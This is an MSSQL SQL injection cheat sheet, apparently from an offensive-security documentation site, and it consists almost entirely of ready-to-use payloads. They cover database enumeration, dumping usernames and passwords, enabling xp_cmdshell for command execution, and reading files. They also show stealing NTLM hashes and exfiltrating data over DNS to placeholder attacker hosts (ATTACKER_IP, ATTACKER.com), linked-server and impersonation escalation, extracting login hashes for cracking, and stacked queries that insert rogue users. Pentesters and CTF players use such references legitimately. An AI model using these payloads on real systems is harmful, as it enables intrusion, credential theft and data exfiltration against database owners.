> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Cheat Sheet — MSSQL

> MSSQL SQL injection cheat sheet: syntax, xp_cmdshell, linked servers, file access, and enumeration.

## Identification

```sql theme={"dark"}
SELECT @@version
-- Comment: -- or /* */
-- String concat: 'a'+'b'
-- No # comments
```

***

## Information Gathering

```sql theme={"dark"}
SELECT db_name()
SELECT system_user
SELECT user_name()
SELECT @@servername
SELECT is_srvrolemember('sysadmin')
```

***

## Enumerate Databases

```sql theme={"dark"}
SELECT name FROM master.sys.databases
SELECT name FROM master..sysdatabases
SELECT DB_NAME(0)         -- Current
SELECT DB_NAME(1)         -- First database
```

***

## Enumerate Tables

```sql theme={"dark"}
SELECT name FROM sysobjects WHERE xtype='U'
SELECT table_name FROM information_schema.tables
SELECT name FROM DBNAME..sysobjects WHERE xtype='U'
```

***

## Enumerate Columns

```sql theme={"dark"}
SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='users')
SELECT column_name FROM information_schema.columns WHERE table_name='users'
```

***

## Dump Data

```sql theme={"dark"}
SELECT username+':'+password FROM users
SELECT TOP 1 username FROM users
SELECT TOP 1 username FROM users WHERE username NOT IN ('admin')    -- Next row
```

***

## String Functions

| Function                 | Description      |
| ------------------------ | ---------------- |
| `+`                      | Concatenate      |
| `SUBSTRING(str,pos,len)` | Substring        |
| `LEFT(str,n)`            | Left N chars     |
| `RIGHT(str,n)`           | Right N chars    |
| `LEN(str)`               | String length    |
| `ASCII(char)`            | ASCII value      |
| `CHAR(n)`                | Char from ASCII  |
| `UPPER(str)`             | Uppercase        |
| `LOWER(str)`             | Lowercase        |
| `REPLACE(str,old,new)`   | Replace          |
| `STR(number)`            | Number to string |

***

## Conditional

```sql theme={"dark"}
IF condition BEGIN true END ELSE BEGIN false END
CASE WHEN condition THEN true_val ELSE false_val END
IIF(condition, true_val, false_val)      -- 2012+
```

***

## Time Delay

```sql theme={"dark"}
WAITFOR DELAY '0:0:5'
IF (1=1) WAITFOR DELAY '0:0:5'
```

***

## Error-Based

```sql theme={"dark"}
CONVERT(int, (QUERY))
CAST((QUERY) AS int)
```

***

## xp\_cmdshell (RCE)

```sql theme={"dark"}
-- Enable
EXEC sp_configure 'show advanced options',1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;

-- Execute
EXEC xp_cmdshell 'whoami'
EXEC xp_cmdshell 'type C:\flag.txt'
```

***

## File Read

```sql theme={"dark"}
SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS x
```

***

## NTLM Hash Steal

```sql theme={"dark"}
EXEC xp_dirtree '\\ATTACKER_IP\share'
EXEC xp_fileexist '\\ATTACKER_IP\share\file'
EXEC xp_subdirs '\\ATTACKER_IP\share'
```

***

## Linked Servers

```sql theme={"dark"}
EXEC sp_linkedservers
SELECT * FROM OPENQUERY([LINKED],'SELECT @@version')
EXEC ('xp_cmdshell ''whoami''') AT [LINKED_SERVER]
```

***

## Impersonation

```sql theme={"dark"}
SELECT * FROM sys.server_permissions WHERE permission_name='IMPERSONATE'
EXECUTE AS LOGIN = 'sa'
EXEC xp_cmdshell 'whoami'
```

***

## Password Hashes

```sql theme={"dark"}
SELECT name, password_hash FROM sys.sql_logins
```

Crack: `hashcat -m 1731`.

***

## Stacked Queries

Fully supported:

```sql theme={"dark"}
'; EXEC xp_cmdshell 'whoami';-- -
'; INSERT INTO users VALUES('hack','pass');-- -
```

***

## DNS Exfiltration

```sql theme={"dark"}
DECLARE @d varchar(1024)
SET @d=(SELECT DB_NAME())
EXEC('master..xp_dirtree "\\'+@d+'.ATTACKER.com\\x"')
```

***

## Sources

* [PortSwigger — SQL Injection Cheat Sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
* [PentestMonkey — MSSQL SQL Injection Cheat Sheet](https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* [Microsoft — Transact-SQL Reference](https://learn.microsoft.com/en-us/sql/t-sql/language-reference)
* [OWASP — SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
* [PayloadsAllTheThings — MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)
